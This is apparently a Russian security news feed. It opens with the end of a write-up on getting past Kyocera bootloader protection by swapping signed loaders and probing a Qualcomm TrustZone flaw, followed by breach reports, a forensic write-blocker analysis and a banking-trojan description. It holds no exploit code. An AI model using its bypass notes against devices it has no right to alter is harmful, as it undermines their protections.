    К сожалению, boot раздел, записанный в fota не загрузился, а bootloop я, к счастью, не получил. Не понятно почему тогда boot раздел, записанный в recovery успешно загрузился. Толку от этого конечно нет, для recovery используется та же защита, что и для boot. Не знаю чем вызвано подобное поведение. Возможно различными смещениями ramdisk и tags:

    boot/recovery:

      ramdisk:      0x01000000
      tags:         0x00000100

    fota:

      ramdisk:      0x02000000
      tags:         0x01e00000

    В Secure boot whitepaper от Qualcomm говорится о том, что подписывается sha256 hash от sha256 hash'ей нескольких сегментов ELF загрузчика. Количество сегментов определено в Subject'е сертификата. Например OU=05 00002000 SW_SIZE говорит о том, что в подписи содержится sha256 hash от первых 256 hash'ей областей по 32 байта (0x2000/32=256). Сам по себе aboot не содержит ELF заголовка и описание больше подходит к sbl1 (secondary boot loader).

    Есть описание работы little kernel от Qualcomm, но и там нет ничего про алгоритм создания подписи aboot. Задача определить алгоритм все еще актуальна.


    Эксперименты с загрузчиками

    Для проведения экспериментов я заказал из штатов за символическую сумму Kyocera Brigadier с разбитым экраном.

    Я проверил цифровые подписи aboot загрузчиков. Subject'ы сертификатов оказались идентичными, следовательно они могут быть взаимозаменяемыми. Решился на эксперимент: прошить aboot от KC-S701 в Brigadier. Загрузчик заработал. На удивление, защита emmc от записи с этим загрузчиком не включилась и я смог спокойно восстановить загрузчик от Brigadier. Понимая все риски, я решил прошить загрузчик от Brigadier на KC-S701. Я бы получил возможность загружать любое неподписанное ядро и использовать fastboot. В этот раз телефон не загрузился.

    Тут история могла бы закончиться, но "телефон не загрузился" — это черный экран. И на моё счастье это был черный экран не Qualcomm QHSUSB__BULK, который требует специального подписанного загрузчика для восстановления телефона, а тот самый download mode, который представляет телефон как USB mass storage. Телефон был восстановлен. На сегодняшний день это последнее, что я предпринял.




    Загрузка Fota

    Почему boot раздел не грузится из раздела fota? Ведь они подписаны одним ключём. Если бы загрузка произошла, то я бы получил разлоченный телефон, в котором не пришлось бы подменять модули.


    Расшифровка Kyocera properties

    Kyocera наряду с android system properties использует свой внутренний механизм properties, который мне тоже не удалось выяснить. Наверняка там хранятся интересные опции, которые могут влиять в том числе и на снятие защиты bootloader'а. В телефоне есть библиотека libkcjprop_jni.so и демон kcjprop_daemon. Библиотеку можно подключить и использовать её функции, но у меня пока не нашлось времени этого сделать.

    Опции пишутся на файловую систему, внутри бинарные данные:

    $ ls -la /sysprop/kcjprop/rw/8d9d788ddd5fecfdbc6c5f7c5cecfc    
    -rw-rw---- root     root           16 1970-01-22 21:01 8d9d788ddd5fecfdbc6c5f7c5cecfc

    Kexec

    Kexec позволяет из ядра Linux загрузить другое ядро. По умолчанию в production релизах ядер отключают поддержку Kexec, но его можно включить через модуль ядра. Затем из user-end можно загрузить любое ядро, которое заменит текущее. Это выглядит как хак, но если хочется загружать своё ядро — этот вариант имеет своё место под солнцем.


    Уязвимость в QSEE

    QSEE — защита в процессорах Qualcomm, в которой недавно уже достаточно давно обнаружили уязвимость. Суть уязвимости — полный доступ к выполнению команд на уровне Trust Zone. Вплоть до загрузки любого ядра.

    Пока еще разбираюсь в этом вопросе. Насколько я понял мне необходимо получить доступ к области emmc, называющейся RPMB. Этого можно добиться отправкой специально сформированной SCM командой. В области RPMB (Replay Protected Memory Block) содержатся биты, которые отвечают за lock/unlock статус.


    Заключение

    image

    Код модулей, aboot загрузчики и библиотека для работы с Kyocera Propertiies находятся в моём репозитории на github: https://github.com/kayrus/break_free.

    С каждым решением очередной проблемы, процесс всё больше напоминает апорию об Ахиллесе и черепахе. Не знаю на сколько еще хватит моего энтузиазма. Возможно здесь есть знающие люди, которые помогут достичь дна кроличьей норы.

    Пользуясь случаем, выражаю благодарность разработчикам из компании Kyocera за прекрасные устройства и их защиту. В противном случае этой статьи бы не было. С другой стороны отсутствие регулярных обновлений сильно огорчает. Если у вас появится модель телефона с возможностью разблокировки загрузчика, я непременно его приобрету.

    P.S. Огромное спасибо Николаю Еленкову (Nikolay Elenkov), автору книги Android security internals. Его пояснения о работе bootloader'а помогли понять процесс загрузки Android.

    P.P.S. Еще один специалист по мобильной ИБ, Justin Case, сказал, что он знает уязвимость, которой подвержены все современные процессоры Qualcomm, но раскрывать её детали он не будет.

    orig: 2017-01-23 07:21:45 / https://habrahabr.ru/post/320150/ (click post title)



    Хакеры похитили данные 1 млн поклонников Clash of Clans

    Злоумышленники проэксплуатировали уязвимость в движке vBulletin.  

    Разработчик популярной мобильной игры Clash of Clans финская компания Supercell сообщила о взломе форума своего сообщества. Согласно официальному уведомлению, в результате инцидента, произошедшего в сентябре прошлого года, были похищены данные (электронные адреса и зашифрованные пароли) порядка 1 млн пользователей.

    В ходе атаки неизвестные хакеры проэксплуатировали уязвимость в движке vBulletin. В прошлом году с ее помощью злоумышленники также взломали поддомены Mail.ru, форумы сайтов Brazzers Epic Games, Dota 2 Dev, Clash of Kings и Ubuntu. Кроме того, в результате взлома ресурса DLH.net были похищены более 9 млн цифровых ключей Steam.

    «Как сообщалось ранее, для нашего форума мы используем программное обеспечение от vbulletin.com. В настоящее время мы изучаем уведомление об уязвимости, позволившей сторонним хакерам получить незаконный доступ к некоторой информации пользователей форума, в том числе к ряду адресов электронной почты и защищенным паролям», - сообщает разработчик.

    Согласно заявлению Supercell, утечка не затронула игровые учетные записи. Участникам форума компания рекомендует сменить пароли.

    orig: 2017-01-23 06:24:45 / http://www.securitylab.ru/news/485096.php (click post title)



    Аппаратные или программные блокираторы записи — что надежнее?

    Являются ли аппаратные блокираторы записи более надежными по сравнению с программными?
    Предисловие
    Проведение криминалистических исследований при расследовании инцидентов информационной безопасности, производство судебных экспертиз и многие другие направления деятельности, связанные с компьютерной криминалистикой, требуют максимально возможного сохранения целостности исследуемых данных. Для этого используются блокираторы записи — программы или устройства, не позволяющие записать что-либо на исследуемый накопитель. Необходимость применения таких средств происходит как из требований процессуального законодательства (например, УПК РФ), так и из различных рекомендаций методического и иного характера, а также из стандартов (например, СТО БР ИББС-1.3-2016). Некоторые аспекты функционирования блокираторов записи и будут рассмотрены в настоящей статье.
    Один из ранних аппаратных блокираторов записи (2002 год)

    Введение
    Многие специалисты по компьютерной криминалистике и юристы разделяют мнение, что аппаратные блокираторы записи являются более надежными, чем программные блокираторы записи; это суждение еще можно найти, прямо или косвенно, в различных публикациях 1
    2
    3. В этой статье я постараюсь раскрыть внутреннее устройство аппаратных и программных блокираторов записи, показав различные проблемы, существующие в данных продуктах.Принципы функционирования
    Аппаратные блокираторы записи
    Все аппаратные блокираторы записи могут быть разделены на две группы в зависимости от того, как они обрабатывают команды, полученные от хоста:


    Аппаратный блокиратор записи работает на базе белого списка, когда он блокирует любую команду накопителю, если она не включена в список известных безопасных команд (не вносящих изменения в хранимые на накопителе данные). В этом режиме работы блокиратор записи будет блокировать все неизвестные команды, включая специфичные для производителя (например, для проведения низкоуровневой диагностики накопителя) и новые (еще не реализованные во встроенной программе блокиратора записи). Такой блокиратор записи может блокировать новые стандартизированные безопасные команды, интерпретируя их как неизвестные.

    Аппаратный блокиратор записи работает на базе черного списка, когда он блокирует команды, включенные в список известных небезопасных команд (вносящих изменения в хранимые на накопителе данные или осуществляющих иные опасные действия), и разрешает прохождение к накопителю любых других команд. В таком режиме работы блокиратор записи будет разрешать неизвестные (специфичные для производителя или новые стандартизированные) небезопасные команды накопителю.

    Кроме того, все аппаратные блокираторы записи могут быть разделены на две другие группы в зависимости от деталей их реализации:


    Аппаратный блокиратор записи работает в качестве транслятора команд, когда он просто транслирует разрешенные команды, полученные от интерфейса-источника, путем их повторения в интерфейс-получатель. Например, простой блокиратор записи типа SATA-to-USB может получать SCSI-команды от USB-интерфейса (использующего набор команд «SCSI transparent command set» для класса «mass storage»), а затем для каждой разрешенной SCSI-команды производить запрос SATA-контроллеру через AHCI, перенаправляя любые ответы обратно хосту по протоколу SCSI.

    Аппаратный блокиратор записи работает в качестве модуля, предоставляющего доступ к блочному устройству, когда он содержит полноценную операционную систему общего назначения, подключенный накопитель определяется как блочное устройство в этой операционной системе, а доступ к чтению с этого блочного устройства разделяется с хостом через специальный драйвер. Такой блокиратор записи с USB-подключением к хосту определит подключенный накопитель как блочное устройство, а затем будет использовать USB-гаджет для эмуляции USB-накопителя с применением указанного блочного устройства в качестве источника данных для эмулируемого накопителя. В такой конфигурации аппаратный блокиратор записи не осуществляет непосредственную трансляцию команд, полученных от хоста в адрес накопителя, он транслирует полученные от хоста команды во внутренние запросы, используемые для чтения данных с блочного устройства-источника. Таким образом, множественные команды чтения, полученные от хоста, могут быть соединены в один запрос на чтение, приводящий к отправке подключенному накопителю одной команды чтения. Кроме того, встроенная программа блокиратора записи может осуществлять упреждающее чтение (read-ahead) в кеш, это приводит к тому, что одна команда чтения, полученная от хоста, может и не привести к немедленной отправке соответствующей команды чтения подключенному накопителю, поскольку запрошенные данные уже были прочитаны и добавлены в кеш встроенной программой.

    Кроме того, аппаратные блокираторы записи могут предоставлять особые функции для некоторых типичных и нетипичных применений:


    Программные блокираторы записи
    Детали реализации программных блокираторов записи зависят от используемой операционной системы. В операционных системах, работающих в реальном режиме, вроде DOS, программные блокираторы записи перехватывают прерывание BIOS 0x13, используемое для чтения и записи данных диска, отфильтровывая запросы на запись и вызывая исходный обработчик прерывания для запросов на чтение. Современные операционные системы вроде Windows и GNU/Linux используют драйверы прямого доступа для взаимодействия с накопителями, прерывание BIOS 0x13 используются загрузчиком для чтения ядра и других данных (вроде драйверов прямого доступа) только на раннем этапе загрузки. Таким образом, существуют множество путей для реализации функциональности блокировки записи, например:
    В зависимости от реализации, программные блокираторы записи могут анализировать или блокировать следующие виды запросов:
    Кроме того, программный блокиратор записи может представлять накопитель операционной системе с пометкой «только чтение».

    В современных операционных системах были встречены следующие реализации блокировки записи:

    Windows:


    Linux:
    При работе с запросами, сформированными на базе родного протокола (вроде SCSI в Windows), программный блокиратор записи может работать с черными и белыми списками, как было показано ранее.

    В целом, программные блокираторы записи должны перехватывать запросы или в одной точке (например, перед передачей запроса одному из многих драйверов накопителей), или во всех местах сразу (например, во всех драйверах накопителей).

    Следует отметить, что программный блокиратор записи не может перекрыть все возможные пути передачи небезопасной команды накопителю. Например, ядро может предоставлять интерфейс для отправки «сырых» запросов накопителю (вроде интерфейса SG_IO в Linux), или архитектура драйверов накопителей может позволять какому-либо драйверу отправить запрос в обход фильтрующего драйвера (как в Windows), или низкоуровневый драйвер может самостоятельно отправлять небезопасные команды, или какая-либо программа может просто отключить блокиратор записи. И хотя можно предпринять некоторые меры против таких недостатков, идея проста — всегда существует путь, обходящий программный блокиратор записи.

    Программные квазиблокираторы записи
    Существует возможность создать такую операционную систему, которая не будет отправлять небезопасные команды подключенным накопителям во время и после загрузки, кроме ситуаций, когда пользователь явно запускает программу, отправляющую небезопасные запросы. В таком случае нет компонента, блокирующего запись, но нет и команд, подлежащих блокированию (и такие операционные системы часто относят к содержащим механизм блокирования записи, потому в данном разделе и используется обозначение «квази»)

    К сожалению, некоторые продукты описываются, как содержащие программный блокиратор записи, но в действительности в них нет такого блокиратора, а в зависимости от различных обстоятельств подобный продукт может отправлять подключенному накопителю небезопасные команды.

    Сравнение аппаратных блокираторов записи с программными
    Могут быть отмечены следующие важные различия между аппаратными и программными блокираторами записи:
    Есть мнение, что программные блокираторы записи не могут быть надежными, потому что зависят от хрупкой программной среды: например, обновление операционной системы, или обновление драйвера, или ошибка (в аппаратном или программном обеспечении) может препятствовать механизму блокировки записи; аппаратные блокираторы записи, с другой стороны, считаются надежными, потому что содержат стабильное, хорошо протестированное аппаратное обеспечение и встроенное программное обеспечение4.Проверка криминалистической правильности
    Программные квазиблокираторы записи
    SUMURI PALADIN 4.01
    PALADIN — это не требующий установки дистрибутив (основанный на Linux), разработанный для загрузки исследуемого компьютера с целью предварительного просмотра данных или их сбора. Кроме того, этот дистрибутив может использоваться на криминалистической рабочей станции в качестве уже готовой операционной системы.

    Согласно документации, доступной в PALADIN 4.01, PALADIN был модифицирован для защиты от записи всех подключенных накопителей после начала загрузки («PALADIN has been modified to write-protect all attached media upon boot»). Тем не менее, данная версия не содержит какого-либо компонента, блокирующего запись; также были выявлены следующие факты записи на подключенные накопители во время загрузки дистрибутива (этот и последующие разделы не содержат исчерпывающего списка обнаруженных проблем (недостатков), указываются только некоторые характерные проблемы; по той же причине аналогичные проблемы в других криминалистических продуктах на основе Debian, Ubuntu и других дистрибутивов не указаны):


    Эти проблемы относятся к раннему этапу загрузки не требующих установки дистрибутивов на базе Ubuntu или Debian, когда программы в стартовой (начальной) файловой системе (initial RAM file system) запускаются с целью найти загрузочный накопитель путем монтирования файловых систем на каждом накопителе (включая объекты исследования) и поиска определенных сигнатур в этих файловых системах (вроде файла, содержащего определенный UUID). Эти действия необходимы для завершения перехода с прерывания BIOS 0x13 или сервисов EFI, используемых загрузчиком, на драйверы прямого доступа, используемые ядром для чтения с загрузочного накопителя.

    Хотя такие проблемы присутствуют в этой и других версиях PALADIN, данный дистрибутив прошел валидацию NIST без каких-либо замечаний о данных проблемах5.

    Программные блокираторы записи
    SUMURI PALADIN 6.01
    PALADIN 6.01 включает компонент ядра (Linux) для блокирования записи, который был негласно включен без каких-либо упоминаний в документации или в журнале изменений. Этот компонент был негласно исключен из более поздних версий данного дистрибутива (например, PALADIN 6.07).

    Во время валидации была обнаружена следующая ошибка в реализации блокировки записи: на раннем этапе загрузки, когда запускаются программы из стартовой файловой системы, компонент блокировки записи блокирует запросы на запись и высвобождение (discard), адресованные всем блочным устройствам со старшим номером 8 (и только). В такой реализации только накопители PATA/SATA/SCSI/USB защищены от записи на указанном этапе загрузки, в то же время, например, носители в считывателях карт (MMC) не защищены от записи, а потому подвержены действию проблемных моментов, указанных ранее.

    Аппаратные блокираторы записи
    Криминалистический дупликатор Tableau TD3
    Криминалистический дупликатор Tableau TD3 (версия программного обеспечения: 2.0.0) может быть использован в качестве сетевого блокиратора записи, открывающего доступ к подключенному исследуемому накопителю по протоколу iSCSI. Драйвер iSCSI блокирует запросы на запись, адресованные исследуемому накопителю, при этом компонент блокировки записи в ядре (Linux) или в аппаратном обеспечении отсутствует. Было обнаружено, что подключение накопителя с файловой системой Ext4, в журнале которой зафиксирована ошибка I/O, приводит к отправке дупликатором нескольких команд записи (модифицирующих файловую систему) через «заблокированный от записи» порт, потому что используемая дупликатором операционная система (на основе Linux) автоматически монтирует файловые системы на накопителе, подключенном через «заблокированный от записи» порт.Криминалистический мост Tableau T356789iu
    Криминалистический мост Tableau T356789iu (версия программного обеспечения: 1.3.0) блокирует попытки чтения хостом секторов, прилегающих к плохому. Было обнаружено, что один плохой сектор на подключенном накопителе приводит к тому, что 128 плохих секторов не могут быть прочитаны хостом якобы из-за ошибки чтения. Установлено, что криминалистический мост использует функциональность упреждающего чтения и кеширования ядра (Linux) при чтении данных с подключенного накопителя (ядро может прочитать и отправить в кеш содержимое секторов до того, как оно будет запрошено программой, запросы на чтения обрабатываются через кеш), а ядро имеет плохое «размельчение» ошибок (оно не перечитывает отдельные секторы внутри большого кешируемого блока после ошибки чтения этого блока).Криминалистический мост Tableau T35es
    Согласно информации от компании Guidance Software6, криминалистические мосты Tableau T35es со старой версией программного обеспечения разрешали передачу SCSI-команд WRITE(16), полученных от хоста через USB-соединение, в адрес подключенного накопителя. Эта проблема является примером недостатка работы на базе черного списка.Криминалистический мост Tableau T8-R2
    Согласно информации от компании Guidance Software7, криминалистические мосты Tableau T8-R2 со старой версией программного обеспечения отправляли на подключенный накопитель команды записи, будучи подключенными к хосту через USB-соединение, при неуказанных обстоятельствах. Подробности сообщены не были, за исключением того, что записываемые данные являются случайными.Выводы
    Можно вполне определенно сказать, что аппаратные блокираторы записи не надежнее программных, в каждом из них возможно существование критических проблем (в особенности в ситуациях, когда аппаратный блокиратор записи содержит полноценную операционную систему общего назначения). Но этот ответ нельзя признать удовлетворительным для криминалистического сообщества, поскольку он не дает нам способа решения проблемы.

    По моему мнению, нужно учесть и реализовать следующее:


    Почему нам нужны улучшенные методологии и методы валидации специализированного программного обеспечения?
    Ответ простой: текущие методологии и методы не удовлетворяют текущим требованиям сообщества.

    Методологии и методы тестирования программных блокираторов записи, опубликованные NIST8 9, не затрагивают механизмы блокировки записи в операционных системах на базе Linux, а равно не затрагивают другие проблемы, существующие в не требующих установки дистрибутивах на базе Windows и Linux (вроде автоматического исполнения кода с объекта исследования во время загрузки с USB-накопителя за счет выбора исследуемого накопителя в качестве загрузочного или использования файловой системы на исследуемом накопителе в качестве содержащей обновления, применяемые автоматически к загружаемой программной среде).

    Методология тестирования и сопутствующие документы для аппаратных блокираторов записи, опубликованные NIST10 11, не фокусируются на ситуации, в которой аппаратный блокиратор записи самостоятельно, без соответствующей команды от хоста, пишет на подключенный накопитель. Проблемы с «размельчением» ошибок также не затрагиваются этими документами. В целом, методы тестирования аппаратных блокираторов записи, упомянутые ранее, подразумевают, что аппаратный блокиратор записи является транслятором команд.

    Почему нам нужны методы, покрывающие все типовые случаи применения?
    Потому что типовые случаи применения специализированного программного обеспечения шире, чем охватывает типовая попытка валидации.

    Например, в NIST не зафиксировали проблемы с модификацией данных в PALADIN 4.0, потому что проведенные тесты не включают в себя «грязные» файловые системы. Вместе с тем «грязные» файловые системы — это обычная ситуация в ходе криминалистических исследований (например, после выключения компьютера методом прерывания электропитания).

    В двух недавних отчетах, опубликованных NIST12 13, написано, что некоторые не требующие установки дистрибутивы были протестированы в сочетании с аппаратными блокираторами записи, но типовые случаи применения подобных дистрибутивов включают копирование данных без аппаратного блокиратора записи (например, когда накопитель нельзя извлечь из компьютера или его невозможно подключить к аппаратному блокиратору записи). Очевидно, что результаты в этих отчетах не могут быть экстраполированы на копирование данных без аппаратного блокиратора записи.

    Почему нам нужны методы, не опирающиеся только на тестирование «черного ящика»?
    Потому что число типовых случаев применения превышает реальные возможности.

    Файловые системы содержат различные флаги, которые могут быть установлены или сняты в суперблоках или других подобных структурах, журналируемая файловая система может быть использована без журнала и т. д. Файловые системы могут быть записаны на накопителях на жестких магнитных дисках, флеш-накопителях и других видах носителей информации, а операционные системы могут вести себя по-разному в зависимости от этого. Не представляется возможным учесть все вероятные состояния файловой системы (а, значит, и все вероятные пути исполнения, которые могут привести к отправке запросов на запись).

    Учитывая данный факт, реальнее идентифицировать слабые места с использованием подхода с «белым ящиком», а затем разработать наборы тестов для «черного ящика».

    Почему мы хотим, чтобы разработчики раскрывали подтвержденные ими проблемы и реализованные ими исправления ошибок?
    Конечно, изменение данных на объектах исследования не приводит автоматически к признанию таких доказательств недопустимыми. Например, копирование информации из мобильных устройств и с работающих систем подразумевает внесение изменений в данные на оригинальном накопителе с целью получения доступа к этим же данным. Но такие способы копирования не могут служить оправданием для изменений, вносимых средствами, от которых это не ожидается (хотя даже такие изменения еще не делают доказательства недопустимыми во всех случаях).

    В зависимости от требований законодательства лицо, проводящее исследование, может быть заинтересовано в получении сведений о том, какие изменения в данные на объекте исследования, если таковые вообще есть, вносятся выбранным средством, каковы причины и условия проявления у такого поведения и как все это влияет на доказательства в каждой ситуации. Без информации от разработчиков (вроде детальных журналов изменений по каждой проблеме с криминалистической правильностью) такие требования не могут быть полностью удовлетворены.

    Ссылки
    1. Nikkel B. Practical forensic imaging. 2016.
    2. Morton T. Introduction to Digital Forensics. 2011.
    3. Al Falayleh M. и Al-Karaki J. On the Selection of Write Blockers for Disk Acquisition: A Comparative Practical Study. 2013.
    4. Menz M. и Bress S. The Fallacy of Software Write Protection in Computer Forensics. 2004.
    5. NIST. Test Results for Digital Data Acquisition Tool: Paladin 4.0. 2014.
    6. Guidance Software. Tableau Firmware Update: TFU v6.80. 2010.
    7. Guidance Software. Tableau Firmware Update: TFU v6.84. 2011.
    8. NIST. Software Write Block Tool Specification & Test Plan. 2003.
    9. NIST. ACES Test Suite User’s Guide. 2008.
    10. NIST. Hardware Write Blocker (HWB) Assertions and Test Plan. 2005.
    11. NIST. Hardware Write Blocker Device (HWB) Specification. 2004.
    12. NIST. Test Results for Disk Imaging Tool: Paladin v6.09. 2016.
    13. NIST. Test Results for Disk Imaging Tool: Paladin v6.08. 2016.

    orig: 2017-01-23 06:15:26 / https://habrahabr.ru/post/320032/ (click post title)



    Хакеры разместили в твиттере NYT сообщение о ракетном ударе РФ по США

    Неизвестные взломали страничку The New York Times в Twitter.

    Утром минувшего воскресенья в одной из учетных записей издания The New York Times в соцсети Twitter (@nytvideo) появилась «срочная информация» о подготовке ракетной атаки из России со ссылкой на якобы «утекшее» заявление президента РФ Владимира Путина. Впоследствии выяснилось, что учетная запись подверглась хакерской атаке, сообщает издание The Hill.

    Вскоре после публикации сообщение было удалено, однако ресурс приводит скриншот размещенного хакерами твита.


    Чуть позже на страничке NYT появились сообщения якобы от группировки OurMine, причастной к взломам учетных записей в Twitter известных персон, в том числе исполнительного директора Twitter Джека Дорси (Jack Dorsey). В серии сообщений участники группы утверждали, что компрометация аккаунта NYT - дело рук других хакеров, ранее взломавших страничку в Twitter компании Sony Music Entertainment. Позднее эти сообщения также были удалены.

    The New York Times уже пояснила, что не имеет никакого отношения к провокации. Согласно сообщению издания, твиты были опубликованы без разрешения. В настоящее время ведется расследование инцидента.


    orig: 2017-01-23 05:47:07 / http://www.securitylab.ru/news/485094.php (click post title)



    Участник 33C3 столкнулся с трудностями при въезде в США

    Таможенники изъяли у Винсента Кэнфилда 14 устройств и не спешат их возвращать.  

    Владельцы поддерживающих Tor почтовых сервисов рискуют столкнуться с трудностями при пересечении границы США. По крайней мере, так произошло с администратором сервиса cock.li Винсентом Кэнфилдом (Vincent Canfield).

    Кэнфилд является выходцем из США, однако в настоящее время проживает в Румынии. После участия в конференции Chaos Communication Congress, проходившей в прошлом месяце в Германии, он решил приехать на отдых на родину. Тем не менее, на таможне Кэнфилд столкнулся с рядом трудностей. Сотрудники Бюро таможенного и пограничного контроля (Customs and Border Protection, CPB) более трех часов допрашивали его, однако задержанный отказался отвечать и предоставил контактные данные своего адвоката.

    Помимо прочего, таможенники потребовали от Кэнфилда разблокировать смартфон. Мужчина отказался, и сотрудники бюро изъяли 14 имеющихся при нем устройств. CPB должно вернуть изъятые гаджеты, однако, по словам Кэнфилда, он их еще не получил. Некоторым приходится ждать от полугода до года, чтобы получить обратно изъятые на таможне вещи.

    Помимо устройств для хранения информации, сотрудники CPB изъяли у Кэнфилда наушники, микрофон и даже USB-кабель, поскольку он «может подключаться к Kindle, способному подключаться к лэптопу, способному подключаться к телефону». Все устройства защищены шифрованием, поэтому Кэнфилд не беспокоится за сохранность хранящейся на них информации.

    orig: 2017-01-23 05:38:10 / http://www.securitylab.ru/news/485095.php (click post title)



    350 тысяч Twitter-ботов цитируют «Звездные войны»

    Исследователи Хуан Эчеверрия (Juan Echeverria) и Си Чжоу (Shi Zhou) из Университетского колледжа Лондона обнаружили спящий ботнет, который составлен из более чем из 350 тыс. аккаунтов в Twitter, цитирующих «Звездные войны».

    Боты в Twitter могут использоваться с различными целями — например, для спама, маркетинга, распространения зловредов, троллинга, манипулирования популярными темами. Многие считают, что боты повлияли на настроения избирателей в США и, таким образом, на исход президентских выборов.

    При анализе 1% англоязычных Twitter-аккаунтов (это около 6 млн профилей) Эчеверрия и Чжоу обнаружили любопытный тренд. При анализе геолокационных данных около 20 млн твитов в общей выборке из 843 млн твитов выяснилось, что публикации некоторых аккаунтов происходили в неожиданных местах — например, в морях, пустынях или Арктике.

    Проверив тексты этих твитов, эксперты отметили, что большинство из них содержали случайные отрывки из книг по вселенной «Звездных войн» и даже прерывались, не закончив фразу или слово. Также в твитах заключался случайный хештег.  Например, вот один из твитов, приведенный в переводе:

    «В ответ Люк ускорился. Теперь их #разделяли только десять метров. Если он смог покрыть это рас»

    По словам исследователей, эта цитата взята из книги «Star Wars: Choices of One». Боты в общей сложности цитируют по крайней мере 11 книг по «Звездным войнам».

    Проанализировав образец примерно из 5 тыс. аккаунтов вручную, эксперты выявили 3244 бота с общими характеристиками. Кроме любви к «Звездным войнам» боты отличаются использованием случайных хештегов или хештегов, ассоциируемых с новыми фолловерами, а также приверженностью одной платформе — Windows Phone. Кроме того, они никогда не используют упоминания и ретвиты. С момента регистрации боты опубликовали менее 11 твитов и имеют от 10 до 31 фолловера.

    Боты успешно избегали автоматического детектирования, и только «человеческие» методы помогли идентифицировать подозрительную активность. Исследователи обратили внимание на аномалию, взглянув на карту и заметив несоответствия, тогда как сам сервис не ставит под сомнение легитимность аккаунта, публикующего твит из пустыни Сахара.

    Ботнет находится в спящем состоянии с 2013 года. Исследователи связывают это явление с желанием владельцев ботнета продать его подороже, так как более «старые» боты ценятся выше, считаясь менее подозрительными и, следовательно, менее рисковыми.

    В Twitter не знали о проблеме, поэтому от комментариев отказались. Исследователи пока не сообщили ID ботов в Twitter, так как ждут публикации своей статьи в научном журнале. Также дуэт ИБ-экспертов готовит для публикации еще одну статью о другом ботнете, найденном в ходе предыдущего исследования. Он еще больше и состоит из 500 тыс. аккаунтов.

    orig: 2017-01-23 05:34:02 / https://threatpost.ru/350-tys-twitter-botov-tsitiruyut-zvezdnye-vojny/20206/ (click post title)



    В Испании по запросу ФБР задержан россиянин

    В аэропорту Барселоны в конце прошлой недели арестован российский программист Станислав Лисов. Представители испанской полиции заявили, что Лисов задержан по запросу ФБР и Интерпола; россиянина подозревают в причастности к созданию и распространению известного банковского троянца Neverquest (он же Vawtrak). Расследование, приведшее испанских правоохранителей к Лисову, продолжалось с 2014 года.

    31-летний Лисов, системный администратор из Таганрога, был взят под стражу в аэропорту Барселоны, когда вместе с женой сдавал взятую в службе проката машину. Судья вынес решение, что подозреваемый может скрыться, поэтому мерой пресечения избрано заключение в изолятор. Лисова могут экстрадировать в США без суда в Мадриде, пока никаких обвинений ему не предъявили. Сейчас Лисов находится в тюрьме Brians в городе Марторель в Каталонии.

    В своем комментарии посольство РФ в Испании сообщило, что испанские власти официально уведомили диппредставительство о задержании российского гражданина. Пока российская сторона ждет от испанских правоохранительных органов разъяснений причин задержания Лисова. Американская сторона, по чьему запросу был взят под стражу Лисов, на данный момент комментариев не предоставила.

    Представители российского подразделения Международного комитета защиты прав человека считают, что задержание российского гражданина на территории третьей страны без уведомления российских властей и без предъявления конкретных обвинений в адрес подозреваемого является нарушением норм международного права. По словам ведомства, в официальных базах разыскиваемых лиц Интерпола и ФБР Лисов не фигурирует.

    По данным IBM X-Force, Neverquest, также известный как Vawtrak и Snifula, является одним из самых распространенных банкеров на сегодняшний день: его доля рынка колеблется около 20%. Летом зловред пережил значительное обновление, а ущерб, нанесенный им за все время существования, составил около $5 млн. Имея способность к самораспространению, зловред отсылает своим хозяевам банковские реквизиты и другие персональные данные, давая им возможность проводить транзакции от имени жертвы через установленное Neverquest VNC-подключение.

    orig: 2017-01-23 05:26:01 / https://threatpost.ru/v-ispanii-po-zaprosu-fbr-zaderzhan-rossiyanin/20204/ (click post title)



    В Сети опубликован исходный код одного из банковских Android-троянов

    Эксперты ожидают рост числа атак банковских троянов на пользователей Android.

    На одном из подпольных форумов в свободном доступе был опубликован исходный код неизвестного банковского Android-трояна вместе с инструкциями по его применению. Вирусописатели разместили данные всего месяц назад, однако специалисты компании «Доктор Веб» уже обнаружили вредонос, разработанный на основе обнародованного исходного кода. Троян, получивший наименование Android.BankBot.149.origin (по классификации «Доктор Веб»), распространяется под видом безобидных приложений.

    Оказавшись на системе, вредоносная программа запрашивает доступ к функциям администратора мобильного устройства с целью осложнить удаление и убирает свою иконку с главного экрана, чтобы жертва ничего не заподозрила. Затем BankBot связывается с C&C-сервером на предмет получения команд.

    По приказу злоумышленников троян может отправлять и перехватывать SMS-сообщения, запрашивать права администратора, выполнять USSD-запросы, получать из телефонной книги список номеров всех контактов, рассылать SMS-сообщения с указанным преступниками текстом контактам из телефонной книги, отслеживать местоположение устройства через спутники GPS, показывать фишинговые окна и т.д.

    По аналогии с другими современными банковскими троянами BankBot похищает конфиденциальные данные пользователей, отслеживая запуск приложений «банк-клиент» и программ для работы с платежными системами.

    Обнаруженная специалистами «Доктор Веб» версия способна контролировать запуск более 30 подобных приложений. Как только троян обнаруживает, что такая программа начала работу, он загружает с управляющего сервера соответствующую фишинговую форму ввода логина\пароля для доступа к учетной записи банка и отображает ее поверх атакуемого приложения.


    Помимо хищения учетных данных, в сферу интересов трояна также входит кража информации о банковской карте жертвы. С этой целью вредонос отслеживает запуск популярных приложений, в том числе Facebook, Viber, YouTube, Messenger, WhatsApp, Uber, Snapchat, WeChat, imo, Instagram, Twitter и Play Маркет, и показывает поверх них фишинговое окно настроек платежного сервиса каталога Google Play. Вся собранная информация отправляется на C&C-сервер злоумышленников.

    orig: 2017-01-23 04:44:00 / http://www.securitylab.ru/news/485091.php (click post title)



    Промежуточная версия нового 17-го приказа

    В недалеком октябре 2015-го года всенародно избранный Президент выпустил очередной (дспшный) перечень поручений, направленный на усиление контроля за защитой информации в государственных органах. В нем было целых 8 пунктов, результаты по многим из которых мы сейчас и наблюдаем:

    По этой причине сейчас активно вносятся изменения в ПП-676, устанавливающее требования к порядку создания, развития, ввода в эксплуатацию, эксплуатации и вывода из эксплуатации государственных информационных систем и дальнейшего хранения содержащейся в их базах данных информации. И в эту же струю укладывается проект изменений 17-го приказа ФСТЭК, который в пятницу был выложен для обсуждения (это значит, что можно не по фейсбукам комментировать, что там не так, а написать разработчикам, чей адрес, указан на странице проекта НПА).

    Надо сразу отметить, что это не тот документ, которого ждали многие. Это промежуточная версия, задача которой закрыть ряд стоящих перед ФСТЭК вопросов, которые не касаются непосредственно состава и содержания защитных мер. Вот именно последнего многие ждут и именно последнее отложено на неопределенный срок, связанный с принятием поправок в ФЗ-149. Как только эти поправки примут, тогда, спустя некоторое время, и выйдет серьезно обновленная редакция 17-го приказа. А пока посмотрим, что нам подготовил регулятор в текущем проекте помимо косметических и терминологических правок:

